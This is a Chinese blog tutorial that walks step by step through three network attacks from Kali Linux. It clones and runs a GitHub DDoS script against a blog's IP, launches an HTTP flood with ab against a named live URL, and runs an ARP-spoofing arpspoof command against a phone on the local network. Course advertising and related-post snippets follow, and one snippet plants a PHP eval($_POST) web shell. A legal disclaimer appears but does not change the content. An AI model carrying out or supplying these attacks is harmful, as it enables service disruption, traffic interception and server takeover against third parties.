Kali Linux三种网络攻击方法总结(DDoS、CC和ARP欺骗)_最强ddos攻击工具kali阻断网络连接

于 2024-09-28 14:14:29 发布
阅读量1.2k 收藏 10
点赞数 10
文章标签: linux ddos 运维 web安全 计算机网络 数据库 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shanguicsdn111/article/details/142615260
版权

本文章使用的是Kali Linux的2020-4-installer-amd64版本

Kali Linux的安装过程本文章不做过多说明,请自行百度

请正确使用DDos和CC攻击,不要用来做违反当地法律法规的事情,否则后果自负

一、DDos攻击

首先,打开一个命令行
在这里插入图片描述

输入以下命令:

git clone https://github.com/Andysun06/ddos

提示如图所示

请添加图片描述

这样,用于DDos的数据包就已经下载到了你的Kali上

下面,进入你所下载的DDos文件夹,输入命令(注意大小写):

cd ddos

请添加图片描述

本文用于演示的kali是2020年版本,用python执行ddos-p2.py,输入命令:

python ddos-p2.py

界面会如下图所示:

请添加图片描述

然后输入攻击对象的IP(本教程以我的博客为例)

再打开一个命令行窗口:

在这里插入图片描述

输入命令:

ping andysun06.gitee.io

在这里插入图片描述
即可获得攻击对象的IP地址。(获取IP后Ctrl+C可以结束ping)

然后回到刚刚的命令行窗口,输入ping到的IP地址:
请添加图片描述

Attack Port即攻击端口,一般服务器默认为80(更多内容请百度)
Attack Speed即攻击速度,数值越大越快,最大不能超过1000
请添加图片描述

按下回车,如果出现以下界面,即代表已经开始向该IP发起DDos攻击,也就成功了。

在这里插入图片描述

二、CC攻击

首先打开一个命令行窗口在这里插入图片描述
先获得root权限,输入以下命令:

sudo su

在这里插入图片描述
然后输入你的账号密码(注意:输入后不会显示出来,不用担心是否输入进去,在输完后按回车,如果输入成功就会获得root权限)
在这里插入图片描述
然后输入以下命令:

ab -n 参数1 -c 参数2 网站地址

参数一是并发数(请求的用户量)
参数二是发送总量(请求的总次数)
(有兴趣的可以在百度上另外学习)
参数1,参数2和网站地址由自己设置,这里以 1000,1000,http://bjvcrrn.nat.ipyingshe.com/bbs/ 为例:

在这里插入图片描述
出现如上界面即代表已经对目标网址开始了CC攻击,如果出现如下界面,即代表CC攻击完成:

在这里插入图片描述

三、ARP欺骗

首先,ARP欺骗需要用到dsniff数据包(arpspoof 是 dsniff 的一个附属工具,所以我们需要安装的是 dsniff),安装命令如下:

apt-get install dsniff

当然,有可能会遇到部分数据包安装错误的情况,如果你遇到了这种情况,可以参考这个博文:Kali Linux 2020中使用arpspoof

如果你已经安装了dsniff数据包,就可以开始ARP欺骗了,首先,通过以下命令确定你的网卡名称和IP地址:

ifconfig

在这里插入图片描述
然后嗅探你所在WLAN下所有设备的IP地址,命令如下:

fping -g 本机IP地址/24

例如我的IP是192.168.0.101,命令就是fping -g 192.168.0.101/24

在这里插入图片描述
我的手机,IP位192.168.0.100就出现在了这里,我们就拿我的手机作为攻击目标,
先获得root权限,输入以下命令:

sudo su

在这里插入图片描述
然后输入你的账号密码(注意:输入后不会回显出来,不用担心是否输入进去,在输完后按回车,如果输入成功就会获得root权限)
在这里插入图片描述
然后输入以下命令:

arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址

网卡名称的查看上文已经提过,我以我的网卡为例,名称是eth0,攻击目标就是我的手机,IP是192.168.0.100,手机的网关就是192.168.0.1(就是IP的最后一位改为1),于是我的攻击命令就是:

arpspoof -i eth0 -t 192.168.0.100 192.168.0.1

按下回车,如果出现下图回显,就说明正在攻击
在这里插入图片描述
现在,我的手机虽然可以上网,但是速度慢的出奇,几分钟都打不开一个网页图片,这就说明我们的ARP欺骗成功了。

如果你想停止攻击,就按下Ctrl+Z,攻击就停止了。

网络安全学习路线

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

或者扫描下方csdn官方合作二维码获取哦!

在这里插入图片描述

这是一份网络安全从零基础到进阶的学习路线大纲全览,小伙伴们记得点个收藏!

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

阶段一:基础入门

img

网络安全导论

渗透测试基础

网络基础

操作系统基础

Web安全基础

数据库基础

编程基础

CTF基础

该阶段学完年薪15w+没有问题

阶段二:技术进阶(到了这一步你才算入门)

img

弱口令与口令爆破

XSS漏洞

CSRF漏洞

SSRF漏洞

XXE漏洞

SQL注入

任意文件操作漏洞

业务逻辑漏洞

该阶段学完年薪25w+

阶段三:高阶提升

img

反序列化漏洞

RCE

综合靶场实操项目

内网渗透

流量分析

日志分析

恶意代码分析

应急响应

实战训练

该阶段学完即可年薪30w+

阶段四:蓝队课程

img

蓝队基础

蓝队进阶

该部分主攻蓝队的防御,即更容易被大家理解的网络安全工程师。

攻防兼备,年薪收入可以达到40w+

阶段五:面试指南&阶段六:升级内容

img

需要上述路线图对应的网络安全配套视频、源码以及更多网络安全相关书籍&面试题等内容可在文章后方领取。

在这里插入图片描述

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

或者扫描下方csdn官方合作二维码获取哦!

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

感谢您观看我的文章,谢谢!!

程序员鬼鬼
关注
kali DDOS攻击
程序猿的博客
01-05 3万+
本次文章发动DDOS攻击的是Github上的Python脚本 Paylod:https://github.com/Ha3MrX/DDos-Attack 首先从Github克隆到本地: Bash git clone https://github.com/Ha3MrX/DDos-Attack   然后进入DDos-Attack这个目录: Bash cd DDos-Attack ...
kali Linux从入门到入狱 (CC攻击
weixin_66727473的博客
11-16 635
比如www.***.com要写成www.***.com/或者http(s)://www.***.com/8、-k:激活HTTP中的“keepAlive”特性;12、-T:使用POST数据时,设置内容类型头;15、-x:以表格方式输出时,设置表格的属性;1、-A:指定连接服务器的基本的认证凭据;16、-X:使用指定的代理服务器发送请求;7、-i:使用“head”请求方式;9、-n:指定测试会话使用的请求数;6、-H:为请求追加一个额外的头;10、-p:指定包含数据的文件;13、-v:设置详细模式等级;
基于Kali的一次DDos攻击实践
热门推荐
m0_60028455的博客
02-24 2万+
镜像下载、域名解析、时间同步请点击 阿里云开源镜像站 一、什么是DDos攻击 DDOS(Distributed Denial of Service),即分布式拒绝服务,是一种针对于网络服务的攻击行为。对于 DDOS 我们可以这样通俗地理解,假如有一家商店在售卖商品,突然涌过来一大帮人说要买东西,这里面有的人是真正的顾客,有的人只是过来捣乱的,但是售货员可能就会崩溃了(不知道该卖给谁),就会导致一种拒绝服务攻击了。而分布式拒绝服务攻击,则是因为黑客控制了很多台肉鸡来发动攻击。这种攻击近些年来越来越流行,对于
kali linux网络安全弱口令爆破常用命令(二)
最新发布
m0_61869253的博客
08-25 2084
KaliLinux中的Hydra是一款强大的网络登录破解工具,它支持多种协议,如FTP、SSH、Telnet等。弱口令爆破是一种常见的网络攻击手段,通过尝试不同的用户名和密码组合来获取系统的访问权限。Hydra是一款强大的暴力破解工具,可以用于执行弱口令爆破。要尝试破解的目标主机的IP地址或域名。目标主机上服务运行的端口号。目标主机上服务使用的协议,如SSH、FTP等。目标主机上服务的类型,如SSH服务的用户名枚举、密码破解等。指定Hydra使用的攻击方法,如暴力破解、字典攻击等。
Kali常见攻击手段_kali攻击
分享Python知识
11-17 4952
Kali常见攻击手段_kali攻击
使用kali进行DDos攻击
相关项目可以查看https://gitee.com/fan-pl或https://github.com/fpl1116
04-23 1198
使用kali进行DDos攻击
Kali Linux发动DDOS攻击
qq_64868579的博客
06-11 3910
DHCP通常被应用在大型局域网中,主要作用是集中地管理、分配IP地址,使网络环境中的主机动态地获取IP地址、网关地址、DNS服务器地址等信息,并能够提升地址的使用率。DHCP攻击的目标也是服务器,怀有恶意攻击攻击者伪造大量DHCP请求发送到服务器,这样DHCP服务器地址池中的IP地址很快就会分配完,从而导致合法用户无法申请到IP地址。执行攻击后,Yersinia会在本网段内不停发送请求数据包,很快HDCP服务器地址池内所有的有效IP地址都无法使用,新的用户将无法获取IP地址,整个网络陷入瘫痪状态。
Kali对网站进行DDOS攻击
X_Walter的博客
10-19 8449
下载相应的脚本文件 git clone https://github.com/Ha3MrX/DDOs-Attack * 进入下载的目录,对脚本加入执行权限: cd DDOs-Attack/ chmod +x ddos-attack.py * 用脚本进行DDOS攻击: python ddos-attack.py 写入相应的网址以及端口,开始攻击 ...
Kali Linux无线网络攻击与防御:WEP_WPA_WPA2的破解与防护
随着无线网络技术的普及,越来越多的个人和企业依赖于无线连接来满足日常通信和数据传输需求。然而,无线网络开放的信号特点使其安全性备受挑战。在不安全的无线网络环境下,数据传输容易遭受监听、篡改和未授权的...
无线网络渗透测试实战:Kali Linux权威教程
[无线网络渗透测试实战:Kali Linux权威教程](https://img-blog.csdnimg.cn/5dc071d159154a6688d104f549a345e3.png) # 1. 无线网络渗透测试基础 在当今的数字化时代,无线网络已经成为人们日常生活中不可或缺的一...
[网络安全自学篇] 二十三.基于机器学习的恶意请求识别及安全领域中的机器学习
杨秀璋的专栏
11-01 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Web渗透的第一步工作,涉及网站信息、域名信息、端口信息、敏感信息及指纹信息收集。这篇文章换个口味,将分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。
数据包分析进阶教程:用Wireshark深入Kali Linux
数据包分析是指捕获并检查通过网络传输的数据包,目的是为了监控和诊断网络问题,以及为了安全分析而识别恶意活动或违规行为。数据包是网络通信中的基本信息单位,包含着从发送者到接收者的所有信息。 ## 1.1 ...
网络安全专业名词解释
aixmmmlll的博客
05-16 3956
1.Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 2.Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 3.C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互
黑客常用 Linux 入侵常用命令
杨春建的博客
02-10 1万+
原文地址:http://blog.csdn.net/jHstGeWWubw/article/details/78941387写个php一句话后门上去:[jobcruit@wa64-054 rankup_log]$ echo -e "<?php @eval(\$_POST[md5])?>" >rankuplog_time.php[jobcruit@wa64-054 rankup_l...
Kali Linux DDos攻击CC攻击、ARP攻击
qq_61901169的博客
06-03 2467
注:Kali官网下载可以直接打开的2023版本的虚拟机无法运行。
Kali常见攻击手段
lvaolan的博客
05-05 3559
仅用于教程和科普,切勿做违法之事,否则后果自负。
kali LinuxDDos攻击(详细教程)
weixin_66727473的博客
10-30 7376
本文章使用的是Kali Linux的2021-1的版本。vm虚拟机里kali安装我就不做说明了,相信各位可以的不会的可以私聊本作者。请正确使用DDos不要用来做违反当地法律法规的事情,否则后果自负。DDos攻击首先打开我们kali Linux里的命令行如果有kali模式的话我们要先切换到root模式切记kali的密码是不显示的大部分账号密码都是一致的 接下来输入以下命令:这样DDos的数据包就已经下载到了你的Kali上 下面进入你所下载的DDos文件夹 (注意字母大小写)然后用python执行 如果进入了
KaLi Linux渗透攻击
weixin_64531675的博客
06-12 4107
被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。使用browser_autopwn2模块可以建立一个攻击用的WEB服务器,这个服务器集成了多个浏览器漏洞,可以向浏览器发送各种攻击脚本,只要有一个攻击脚本攻击成功,即可建立会话。(将该网址复制到靶机中访问)
Kali Linux网络攻击
m0_51418771的博客
12-21 2818
利用kali扫描网段IP时,发现通过NAT方式连接的kali虚拟机和主机不在同一网段下,输入arpspoof相关的语句,kali自动检索提示install,直接y就可。将该IP地址的设备,arp请求的192.168.1.1,返回mac地址为本机。主机是192.168.1.3……这时我的手机不能联网了,搜索消息和发送都不能做到,但是网络显示连接良好。这样只能扫描到虚拟机下的Ubuntu,不能扫描局域网内的其它设备。解释:/24是标记位法,通过子网掩码的长度确定。第一次我还未安装,选择默认的y,安装完成。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值